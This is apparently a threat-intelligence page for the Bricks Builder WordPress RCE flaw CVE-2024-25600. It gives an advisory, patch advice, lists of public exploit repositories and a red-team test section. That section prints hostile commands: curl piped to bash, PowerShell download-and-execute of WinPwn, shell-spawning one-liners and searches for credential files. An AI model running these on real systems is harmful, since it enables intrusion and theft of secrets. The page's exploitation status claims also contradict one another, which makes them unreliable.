CVE-2024-25600

CRITICAL EXPLOIT POC TTE Zero-Day Pub 04/06 Upd 28/04

Overview

This vulnerability is a code injection flaw classified under CWE-94, resulting from improper control over code generation within the Bricks Builder WordPress theme. The root cause lies in inadequate sanitization and validation of user-supplied input submitted to the theme's rendering API, allowing untrusted data to be executed as code. The affected component is the Bricks Builder theme, specifically versions up to and including 1.9.6, which processes input through its rendering endpoints without sufficient security controls.

Vulnerability Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.

Impact

An attacker can execute arbitrary code remotely without any authentication or user interaction, resulting in full compromise of the WordPress site and underlying server. This includes the ability to run system commands, manipulate site content, access sensitive data, and potentially pivot within the hosting environment. The exploit enables complete site takeover, leading to data breaches, service disruption, and loss of integrity and availability of the affected web property.

Solution

Users should upgrade the Bricks Builder theme to version 1.9.7 or later, where the vulnerability has been patched. Detailed patch instructions and advisories are available through the vendor’s official channels and the Patchstack article at https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme. No alternative workarounds are recommended; applying the vendor-supplied update is required to remediate this issue.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability present in Bricks Builder, which allows for improper control over the generation of code, is a critical security flaw that can lead to code injection attacks. This type of vulnerability arises when an application fails to properly validate or sanitize user inputs, allowing an attacker to inject malicious code into the system. In the case of Bricks Builder, this flaw can be exploited to execute arbitrary code on the server, potentially leading to unauthorized access to sensitive data, manipulation of application logic, or even complete system compromise. The affected versions, up to 1.9.6, are particularly vulnerable, as they lack the necessary safeguards to prevent such code injection.

Attack vectors for this vulnerability are varied and can be executed through multiple channels. An attacker could exploit this flaw by crafting a malicious payload that is submitted through forms or API endpoints within the Bricks Builder environment. For instance, if a user is able to input data that is subsequently processed by the application without adequate validation, the attacker can inject scripts or commands that the server will execute. Scenarios may include injecting PHP code that could allow the attacker to gain shell access to the server, or injecting JavaScript that could manipulate client-side behavior, leading to further exploitation such as cross-site scripting (XSS) or data exfiltration.

The real-world impact of this vulnerability is significant, particularly for businesses that rely on Bricks Builder for their web development needs. A successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. Organizations could face financial losses from remediation efforts, downtime, and reputational damage. Furthermore, the high CVSS score of 10.0 indicates that the vulnerability poses an extreme risk, making it imperative for businesses to address it promptly to safeguard their operations and customer information.

To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and code reviews can help identify areas where user input is not adequately sanitized. Employing web application firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. Furthermore, developers should adopt secure coding practices, such as input validation and output encoding, to prevent code injection vulnerabilities from being introduced in the first place. Keeping the Bricks Builder and its dependencies up to date is essential, as newer versions may include patches that address this vulnerability.

In conclusion, the improper control of code generation in Bricks Builder represents a critical security risk that can lead to severe consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, businesses can take proactive steps to detect and mitigate the risks associated with code injection. Implementing robust security measures and fostering a culture of security awareness among developers will be key in preventing exploitation and protecting sensitive data in an increasingly complex threat landscape.




CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2024-25600, evidenced by the emergence of multiple new proof-of-concept exploit tools publicly available on GitHub. This development signifies a broadening of the exploit landscape, lowering the barrier for threat actors to weaponize the vulnerability in Bricks Builder. Our telemetry indicates that these tools automate unauthenticated remote code execution, increasing the likelihood of opportunistic attacks against unpatched WordPress environments. The publication of an official ExploitDB entry further legitimizes and facilitates adversary engagement with this critical vulnerability. Although the EPSS score remains high and stable, the rapid proliferation of exploitation resources elevates the operational risk, signaling a shift from theoretical to practical exploitation. Defenders should recognize that the threat actor community is actively leveraging this vulnerability, which underscores an urgent need for heightened vigilance in detection and response efforts.



Update 2 — July 17, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-25600, accompanied by the emergence of several sophisticated proof-of-concept tools that enhance attacker capabilities. These new tools incorporate advanced features such as interactive shells, multi-threaded scanning, and stealth modes, significantly lowering the technical barrier for threat actors to conduct unauthenticated remote code execution against vulnerable Bricks Builder installations. Our telemetry indicates that this surge is not only quantitative but qualitative, reflecting a maturation of the exploit landscape that enables more persistent and evasive attacks. Although the EPSS score shows a modest increase, the operational risk has grown disproportionately due to the expanded availability and functionality of exploitation frameworks. This evolution elevates the threat level from a primarily theoretical concern to an actively exploited vector, increasing the urgency for defenders to prioritize detection and response efforts against this vulnerability.



Update 3 — July 25, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2024-25600 vulnerability in Codeer Limited’s Bricks Builder. This increase is accompanied by the emergence of multiple new proof-of-concept exploit tools that enhance attacker capabilities, including interactive shells, stealth modes, and multi-threaded scanning functionalities. These developments indicate a rapid maturation of the exploit ecosystem, enabling adversaries to conduct more sophisticated and persistent attacks with greater operational flexibility. Although the EPSS score remains stable, the qualitative shift in exploit sophistication and availability significantly elevates the practical risk to affected environments. Defenders should recognize that this vulnerability is transitioning from a high-severity theoretical risk to an actively weaponized threat, increasing the likelihood of successful compromise and sustained control over vulnerable WordPress installations.

Affected Products

No CPE information available.

Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Unauthenticated RCE in Bricks Builder Theme
exploits/multi/http/wp_bricks_builder_rce
Calvin Alkan, Valentin Lobstein Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
WordPress Bricks Builder Theme - RCE Jared Brits webapps multiple - View

GitHub PoCs (24)

Repository Author Stars Forks Date Link
Chocapikk/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Chocapikk 180 39 2024-02-20 View
K3ysTr0K3R/CVE-2024-25600-EXPLOIT
A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)
K3ysTr0K3R 62 10 2024-03-01 View
Christbowel/CVE-2024-25600_Nuclei-Template
Nuclei template and information about the POC for CVE-2024-25600
Christbowel 31 6 2024-02-21 View
so1icitx/CVE-2024-25600
Unauthenticated RCE exploit for CVE-2024-25600 in WordPress Bricks Builder <= 1.9.6. Executes arbitrary code remotely.
so1icitx 13 3 2025-03-31 View
Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress
This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The ...
Tornad0007 8 0 2024-02-22 View
hy011121/CVE-2024-25600-wordpress-Exploit-RCE
(Mirorring)
hy011121 3 1 2024-02-29 View
CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600
CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with in...
CerberusMrXi 1 0 2026-07-16 View
svchostmm/CVE-2024-25600-mass
svchostmm 0 1 2024-05-17 View
X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE
WORDPRESS-CVE-2024-25600-EXPLOIT-RCE - WordPress Bricks Builder Remote Code Execution (RCE)
X-Projetion 1 0 2024-04-20 View
estebanzarate/CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC
Unauthenticated remote code execution vulnerability in WordPress Bricks Builder <= 1.9.6. The template render endpoint a...
estebanzarate 1 0 2026-02-18 View
h0w1tzxr/TryHack3M-Bricks-Heist
🧱 CVE-2024-25600 WordPress Bricks Builder RCE Exploit + TryHackMe Bricks Heist CTF Write-up
h0w1tzxr 0 1 2026-01-04 View
diamorphine666/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks
diamorphine666 0 0 2024-08-20 View
w666-glitch/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks
w666-glitch 0 0 2024-08-20 View
ivanbg2004/ODH-BricksBuilder-CVE-2024-25600-THM
OD&H's scanner for CVE-2024-25600 vulnerability in the Bricks Builder WordPress plugin. For use in Try Hack Me (THM) env...
ivanbg2004 0 0 2025-04-09 View
NanoWraith/CVE-2024-25600
NanoWraith 0 0 2024-06-06 View
Anjai7/TryHack3M-Bricks-Heist
TryHackMe CTF writeup — WordPress RCE via CVE-2024-25600, crypto miner forensics, and LockBit ransomware group identific...
Anjai7 0 0 2025-08-09 View
ranjithxploit/CVE-2024-25600
Modified the CVE-2024-25600
ranjithxploit 0 0 2025-11-28 View
DedsecTeam-BlackHat/Poleposph
Tools for scan CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)
DedsecTeam-BlackHat 0 0 2025-05-09 View
r0otk3r/CVE-2024-25600
r0otk3r 0 0 2025-07-10 View
meli0dasH4ck3r/cve-2024-25600
PoC for CVE-2024-25600
meli0dasH4ck3r 0 0 2025-04-04 View
WanLiChangChengWanLiChang/CVE-2024-25600
WanLiChangChengWanLiChang 0 0 2024-06-06 View
KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress
KaSooMi0228 0 0 2024-07-30 View
Sibul-Dan-Glokta/test-task-CVE-2024-25600
Repository for internship test task.
Sibul-Dan-Glokta 0 0 2025-01-26 View
wh6amiGit/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks
wh6amiGit 0 0 2024-08-20 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

14 events
2026-08-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2024-02-20
PoC Published (24 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2024-02-19
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
100% rce
Code Injection
80% code_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-242 Code Injection
46%
High High
CAPEC-35 Leverage Executable Code in Non-Executable Files
33%
High Very High
CAPEC-77 Manipulating User-Controlled Variables
30%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (6)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2024-25600
patchstack.com
GitHub CVE vdb-entry
https://patchstack.com/database/vulnerability/bricks/wordpress-bricks-theme-1-9-6-unauthenticated-remote-code-execution-rce-vulnerability?_s_id=cve
snicco.io
GitHub CVE third-party-advisory technical-description
https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
patchstack.com
GitHub CVE third-party-advisory technical-description
https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme?_s_id=cve
github.com
GitHub CVE exploit
https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
github.com
GitHub CVE exploit
https://github.com/Chocapikk/CVE-2024-25600